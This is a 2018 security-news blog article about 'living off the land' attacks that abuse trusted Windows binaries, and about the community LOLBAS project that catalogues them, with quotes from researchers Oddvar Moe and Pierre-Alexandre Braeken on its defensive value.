Threats 101
David Bisson
May 2018

LOLBins: Attackers Are Abusing Trusted Binaries to Target Organizations

lolbins-living-off-the-land-tool-abuse

Photo by Savvas Stavrinos

Researchers have set out to build a list of LOLBins, legitimate programs attackers are abusing to bypass security and evade detection.

Trust is one of the key pillars information security is built on. It’s ultimately what determines who has access to what, which applications are allowed to run and which aren’t. But what happens when trust is abused? For example, when authorized, trusted applications are used by bad actors?

That theoretical issue has become a very real problem, with attackers increasingly seeking out legitimate programs they can abuse to carry out malicious activities. Their goal is to blend into typical system activity to avoid raising red flags and give themselves more time to move laterally in the network, conduct espionage, and steal data. Dubbed “living off the land,” it’s a tactic that has experienced explosive growth, with one report estimating that 52% of attacks in 2017 involved the abuse of two legitimate programs — PowerShell or Windows Management Instrumentation (WMI) — in particular.

PowerShell and WMI are far from the only trusted applications with the potential for abuse, however. Recently, researchers have begun building a list of these applications, categorizing them under the name “LOLBins.”

Living off the land with LOLBins

LOLBins are a good example of bad actors' exploitation of trust. Short for "living-off-the-land binaries," they are trusted binaries that an attacker can use to perform actions other than those for which they were originally intended. As such, LOLBins make it possible for attackers to bypass defensive countermeasures such as application whitelisting, security monitoring, and antivirus software with a reduced chance of being detected.

The notion behind LOLBins isn't new. Security researcher and veteran Black Hat trainer Matt Graeber first came up with "living off the land" during a presentation at DerbyCon 3.0. A video of this talk can be found below:

 

Even so, the term "LOLBins" is new. It was first proposed on Twitter during a discussion of what these types of files should be called.

After Graeber lent his support to the term, security researcher Oddvar Moe ran a poll to see if the community could agree on "LOLBins" as a standardized term. The results came back positive, so Moe decided to combine his existing notes on LOLBins with his list of Ultimate AppLocker Bypasses into a new list for LOLBins and LOLScripts to benefit the infosec community. This resulted in the LOLBAS (short for "Living Off the Land Binaries and Scripts") project.

Currently, there are over 80 LOLBins listed, ranging from Microsoft’s legitimate data-transfer tool Bitsadmin.exe to print.exe. The list includes programs that have documented potential for abuse as well as a variety of programs that have already become favorite tools for retrieving malware payloads during real-world attacks, including mshta.exe, certutil.exe, and regsvr32.exe.

Blocking malware guide

Free Guide: Blocking Malware without a SOC

Sabotage attack chains by taking away the tools attackers rely on most. Download the guide

Raising Awareness for LOLBins with the LOLBAS Project

Oddvar Moe

“The point of this project is to highlight that we choose to trust signed binaries and scripts from big vendors without thinking they can be used by attackers to perform further attacks.”

Oddvar Moe, security researcher and Chief Technical Architect at Advania Norway

Moe believes that LOLBAS is responsible for helping to ignite greater interest in LOLBins. 

"Having a good documentation on these binaries and scripts can help everyone prevent attacks by actively their blocking execution," Moe told this author. "If you know something can be used for evil, it makes the job so much easier when looking for attacks and trying to prevent them. Advanced persistence threat (APT) actors are already using these binaries/scripts as part of their attacks, after all. Therefore, we need to dig into all the files and figure out smart ways we can use this list before the attackers do."

LOLBAS functions as a dynamic list maintained by the infosec community. Anyone interested in conducting security research to submit new LOLBins is encouraged to do so and get acknowledged for it. The current list is just the beginning, too. Moe said he hopes to eventually provide a searchable list in a database format for the service, map it to the MITRE ATT&CK framework, and add more data on each LOLBin and LOLScript record, including information on its detection and relevant blocking techniques. 

Security professional and active LOLBins contributor Pierre-Alexandre Braeken feels these intended changes illuminate the importance of LOLBAS and, by extension, just how great a threat that the abuse of trust poses to organizations.

"People should care about living-off-the-land techniques because if they do not, they could be blind when the next attack targeting their company happens," Braeken clarified in an email. "Traditional antivirus or even endpoint detection and response (EDR) products won't always be able to detect this kind of attack. And if they do but the analysts are not aware of this, they could miss a threat happening in their network."

How You Can Get Involved

Those who know a specific file that can be abused in attack scenarios can reach out to Moe directly @oddvarmoe or do a pull request against the LOLBAS GitHub project. They can also tweet out #LOLBin #LOLScript #LOLLib, and it will get picked up eventually. 

Not having specific new examples shouldn't stop people, either. There are still many ways that people can contribute to the LOLBins cause. 

"Everybody can help. If you are new to this, don't be shy," Braeken stated. "Everybody has to start somewhere. If you are already involved with this project, please help welcome other people into the fold. If you have ideas to contribute, pick one. Say hi. Overall, do something that makes the project better."

More information on the LOLBins project can be found on GitHub here.

David Bisson

David Bisson

David Bisson is an infosec news junkie and security journalist. He works as Senior Content Manager, Associate Editor for Tripwire's "The State of Security" blog, Contributing Editor for IBM's Security Intelligence, and Contributing Writer for Barkly, Palo Alto Networks' Security Roundtable, Gemalto, Venafi, Zix Corp, AlienVault, and others.

lock-white.png

Prevent LOLBin abuse

Get practical tips for locking down the most commonly abused tools. Download our new eBook, Blocking Malware without a SOC.

Get the guide

Comments

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.

Stay informed!

Get the latest security news, tips, and trends straight to your inbox.